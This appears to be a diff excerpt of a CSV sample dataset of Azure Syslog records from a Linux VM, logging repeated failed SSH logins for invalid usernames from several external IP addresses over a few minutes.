+10746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:03,UbuntuDevEnv,2019-06-25 23:58:03,auth,UbuntuDevEnv,info,Invalid user guai from 138.68.12.43 port 45178,65881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guai,138.68.12.4,45178,,
+10747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:03,UbuntuDevEnv,2019-06-25 23:58:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,65881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:03,UbuntuDevEnv,2019-06-25 23:58:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,65881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:05,UbuntuDevEnv,2019-06-25 23:58:04,auth,UbuntuDevEnv,info,Failed password for invalid user louis from 114.112.81.180 port 59506 ssh2,65869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,louis,114.112.81.1,59506,,
+10750,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:05,UbuntuDevEnv,2019-06-25 23:58:04,auth,UbuntuDevEnv,info,Failed password for invalid user guai from 138.68.12.43 port 45178 ssh2,65881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guai,138.68.12.4,45178,,
+10751,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:05,UbuntuDevEnv,2019-06-25 23:58:04,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 59506:11: Bye Bye [preauth],65869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,59506,,
+10752,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:05,UbuntuDevEnv,2019-06-25 23:58:04,auth,UbuntuDevEnv,info,Disconnected from invalid user louis 114.112.81.180 port 59506 [preauth],65869,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,louis,114.112.81.1,59506,,
+10753,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:05,UbuntuDevEnv,2019-06-25 23:58:05,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 45178:11: Bye Bye [preauth],65881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,45178,,
+10754,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:58:05,UbuntuDevEnv,2019-06-25 23:58:05,auth,UbuntuDevEnv,info,Disconnected from invalid user guai 138.68.12.43 port 45178 [preauth],65881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guai,138.68.12.4,45178,,
+10755,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:01,UbuntuDevEnv,2019-06-25 23:59:01,auth,UbuntuDevEnv,info,Invalid user edu from 118.222.146.186 port 46600,66085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edu,118.222.146.1,46600,,
+10756,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:01,UbuntuDevEnv,2019-06-25 23:59:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,66085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+10757,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:01,UbuntuDevEnv,2019-06-25 23:59:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:03,UbuntuDevEnv,2019-06-25 23:59:03,auth,UbuntuDevEnv,info,Failed password for invalid user edu from 118.222.146.186 port 46600 ssh2,66085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edu,118.222.146.1,46600,,
+10759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:03,UbuntuDevEnv,2019-06-25 23:59:03,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 46600:11: Bye Bye [preauth],66085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,46600,,
+10760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:03,UbuntuDevEnv,2019-06-25 23:59:03,auth,UbuntuDevEnv,info,Disconnected from invalid user edu 118.222.146.186 port 46600 [preauth],66085,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edu,118.222.146.1,46600,,
+10761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:04,UbuntuDevEnv,2019-06-25 23:59:03,auth,UbuntuDevEnv,info,Invalid user ih from 131.100.219.3 port 38508,66099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ih,131.100.219.3,38508,,
+10762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:04,UbuntuDevEnv,2019-06-25 23:59:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,66099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+10763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:04,UbuntuDevEnv,2019-06-25 23:59:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:05,UbuntuDevEnv,2019-06-25 23:59:05,auth,UbuntuDevEnv,info,Failed password for invalid user ih from 131.100.219.3 port 38508 ssh2,66099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ih,131.100.219.3,38508,,
+10765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:06,UbuntuDevEnv,2019-06-25 23:59:06,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 38508:11: Bye Bye [preauth],66099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,38508,,
+10766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:06,UbuntuDevEnv,2019-06-25 23:59:06,auth,UbuntuDevEnv,info,Disconnected from invalid user ih 131.100.219.3 port 38508 [preauth],66099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ih,131.100.219.3,38508,,
+10767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:29,UbuntuDevEnv,2019-06-25 23:59:28,auth,UbuntuDevEnv,info,Invalid user csgo from 196.27.127.61 port 35957,66192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgo,196.27.127.6,35957,,
+10768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:29,UbuntuDevEnv,2019-06-25 23:59:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:29,UbuntuDevEnv,2019-06-25 23:59:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.27.127.61,66192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.27.127.6,,0,
+10770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:31,UbuntuDevEnv,2019-06-25 23:59:30,auth,UbuntuDevEnv,info,Failed password for invalid user csgo from 196.27.127.61 port 35957 ssh2,66192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgo,196.27.127.6,35957,,
+10771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:31,UbuntuDevEnv,2019-06-25 23:59:30,auth,UbuntuDevEnv,info,Disconnected from invalid user csgo 196.27.127.61 port 35957 [preauth],66192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,csgo,196.27.127.6,35957,,
+10772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:31,UbuntuDevEnv,2019-06-25 23:59:30,auth,UbuntuDevEnv,info,Received disconnect from 196.27.127.61 port 35957:11: Bye Bye [preauth],66192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.27.127.6,35957,,
+10773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:40,UbuntuDevEnv,2019-06-25 23:59:40,auth,UbuntuDevEnv,info,Invalid user gituser from 114.112.81.180 port 50188,66230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gituser,114.112.81.1,50188,,
+10774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:40,UbuntuDevEnv,2019-06-25 23:59:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,66230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+10775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:40,UbuntuDevEnv,2019-06-25 23:59:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:42,UbuntuDevEnv,2019-06-25 23:59:41,auth,UbuntuDevEnv,info,Invalid user titan from 88.247.110.88 port 46641,66246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,titan,88.247.110.8,46641,,
+10777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:42,UbuntuDevEnv,2019-06-25 23:59:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:42,UbuntuDevEnv,2019-06-25 23:59:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=88.247.110.88,66246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,88.247.110.8,,0,
+10779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:42,UbuntuDevEnv,2019-06-25 23:59:42,auth,UbuntuDevEnv,info,Failed password for invalid user gituser from 114.112.81.180 port 50188 ssh2,66230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gituser,114.112.81.1,50188,,
+10780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:42,UbuntuDevEnv,2019-06-25 23:59:42,auth,UbuntuDevEnv,info,Received disconnect from 114.112.81.180 port 50188:11: Bye Bye [preauth],66230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,114.112.81.1,50188,,
+10781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:42,UbuntuDevEnv,2019-06-25 23:59:42,auth,UbuntuDevEnv,info,Disconnected from invalid user gituser 114.112.81.180 port 50188 [preauth],66230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gituser,114.112.81.1,50188,,
+10782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:44,UbuntuDevEnv,2019-06-25 23:59:43,auth,UbuntuDevEnv,info,Failed password for invalid user titan from 88.247.110.88 port 46641 ssh2,66246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,titan,88.247.110.8,46641,,
+10783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:44,UbuntuDevEnv,2019-06-25 23:59:43,auth,UbuntuDevEnv,info,Received disconnect from 88.247.110.88 port 46641:11: Bye Bye [preauth],66246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,88.247.110.8,46641,,
+10784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:59:44,UbuntuDevEnv,2019-06-25 23:59:43,auth,UbuntuDevEnv,info,Disconnected from invalid user titan 88.247.110.88 port 46641 [preauth],66246,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,titan,88.247.110.8,46641,,
+10785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:00:07,UbuntuDevEnv,2019-06-26 00:00:07,auth,UbuntuDevEnv,info,Invalid user olivia from 138.68.12.43 port 33126,66360,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,olivia,138.68.12.4,33126,,
+10786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:00:07,UbuntuDevEnv,2019-06-26 00:00:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66360,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:00:07,UbuntuDevEnv,2019-06-26 00:00:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,66360,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:00:10,UbuntuDevEnv,2019-06-26 00:00:09,auth,UbuntuDevEnv,info,Failed password for invalid user olivia from 138.68.12.43 port 33126 ssh2,66360,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,olivia,138.68.12.4,33126,,
+10789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:00:10,UbuntuDevEnv,2019-06-26 00:00:10,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 33126:11: Bye Bye [preauth],66360,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,33126,,
+10790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:00:10,UbuntuDevEnv,2019-06-26 00:00:10,auth,UbuntuDevEnv,info,Disconnected from invalid user olivia 138.68.12.43 port 33126 [preauth],66360,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,olivia,138.68.12.4,33126,,
+10791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:00:40,UbuntuDevEnv,2019-06-26 00:00:39,auth,UbuntuDevEnv,info,Invalid user esteban from 118.222.146.186 port 35128,66536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esteban,118.222.146.1,35128,,
+10792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:00:40,UbuntuDevEnv,2019-06-26 00:00:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.222.146.186,66536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.222.146.1,,0,
+10793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:00:40,UbuntuDevEnv,2019-06-26 00:00:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:00:42,UbuntuDevEnv,2019-06-26 00:00:41,auth,UbuntuDevEnv,info,Failed password for invalid user esteban from 118.222.146.186 port 35128 ssh2,66536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esteban,118.222.146.1,35128,,
+10795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:00:42,UbuntuDevEnv,2019-06-26 00:00:41,auth,UbuntuDevEnv,info,Received disconnect from 118.222.146.186 port 35128:11: Bye Bye [preauth],66536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.222.146.1,35128,,
+10796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:00:42,UbuntuDevEnv,2019-06-26 00:00:41,auth,UbuntuDevEnv,info,Disconnected from invalid user esteban 118.222.146.186 port 35128 [preauth],66536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,esteban,118.222.146.1,35128,,
+10797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:22,UbuntuDevEnv,2019-06-26 00:01:22,auth,UbuntuDevEnv,info,Invalid user odoo from 131.100.219.3 port 54908,66689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odoo,131.100.219.3,54908,,
+10798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:22,UbuntuDevEnv,2019-06-26 00:01:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:22,UbuntuDevEnv,2019-06-26 00:01:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.100.219.3,66689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.100.219.3,,0,
+10800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:22,UbuntuDevEnv,2019-06-26 00:01:22,auth,UbuntuDevEnv,info,Invalid user amministratore from 114.112.81.180 port 40918,66697,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amministratore,114.112.81.1,40918,,
+10801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:22,UbuntuDevEnv,2019-06-26 00:01:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,66697,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:22,UbuntuDevEnv,2019-06-26 00:01:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=114.112.81.180,66697,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,114.112.81.1,,0,
+10803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:24,UbuntuDevEnv,2019-06-26 00:01:23,auth,UbuntuDevEnv,info,Failed password for invalid user odoo from 131.100.219.3 port 54908 ssh2,66689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,odoo,131.100.219.3,54908,,
+10804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:24,UbuntuDevEnv,2019-06-26 00:01:24,auth,UbuntuDevEnv,info,Failed password for invalid user amministratore from 114.112.81.180 port 40918 ssh2,66697,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amministratore,114.112.81.1,40918,,
+10805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 00:01:24,UbuntuDevEnv,2019-06-26 00:01:24,auth,UbuntuDevEnv,info,Received disconnect from 131.100.219.3 port 54908:11: Bye Bye [preauth],66689,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.100.219.3,54908,,
